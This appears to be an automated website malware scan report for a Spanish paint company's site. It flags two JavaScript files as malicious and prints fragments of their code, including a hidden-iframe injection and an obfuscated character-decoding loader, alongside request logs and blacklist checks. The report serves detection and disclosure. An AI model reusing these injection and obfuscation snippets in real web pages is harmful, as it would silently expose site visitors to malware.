Scanned pages/files
Request | Server response | Status |
http://pinturasviedma.com/ | 200 OK Content-Length: 1482 Content-Type: text/html | clean |
http://pinturasviedma.com/archivos/swf/run.js | 200 OK Content-Length: 9202 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function runSWF(archivo, ancho, alto, version, bgcolor, id, menu, FlashVars, quality, allowScriptAccess) { if(version!=""){
var version_data=version; }else{ var version_data="6,0,0,0"; } if(menu!=""){ menu_data=false; }else{ menu_data=false; } if(bgcolor!=""){ var bgcolor_data=bgcolor; }else{ var bgcolor_data="#FFFFFF"; } if(id!=""){ id_data=id; }else{ id_data="flashMovie"; } if(quality!=" if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://pinturasviedma.com/archivos/swf/brc.js | 200 OK Content-Length: 6151 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (window != window.top)
top.location.href = location.href; function closeWindow() { this.top.close() } window.moveTo(0,0); if (document.all) { top.window.resizeTo(screen.availWidth,screen.availHeight); } else if (document.layers||document.getElementById) { if (top.window.outerHeight<screen.availHeight||top.window.outerWidth<screen.availWidth){ top.window.outerHeight = scree r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Antivirus reports:
| ||
http://pinturasviedma.com/test404page.js | 404 Not Found Content-Length: 910 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pinturasviedma.com
Result:
HTTP/1.1 200 OK
Date: Wed, 16 Apr 2014 04:37:05 GMT
Accept-Ranges: bytes
ETag: "42e8807df185cd1:0"
Server: Microsoft-IIS/7.5
Content-Length: 1482
Content-Type: text/html
Last-Modified: Wed, 29 Aug 2012 14:20:50 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...1482 bytes of data.
GET / HTTP/1.1
Host: pinturasviedma.com
Result:
HTTP/1.1 200 OK
Date: Wed, 16 Apr 2014 04:37:05 GMT
Accept-Ranges: bytes
ETag: "42e8807df185cd1:0"
Server: Microsoft-IIS/7.5
Content-Length: 1482
Content-Type: text/html
Last-Modified: Wed, 29 Aug 2012 14:20:50 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...1482 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: pinturasviedma.com
Referer: http://www.google.com/search?q=pinturasviedma.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pinturasviedma.com
Referer: http://www.google.com/search?q=pinturasviedma.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pinturasviedma.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pinturasviedma.com/
Result: pinturasviedma.com is not infected or malware details are not published yet.
Result: pinturasviedma.com is not infected or malware details are not published yet.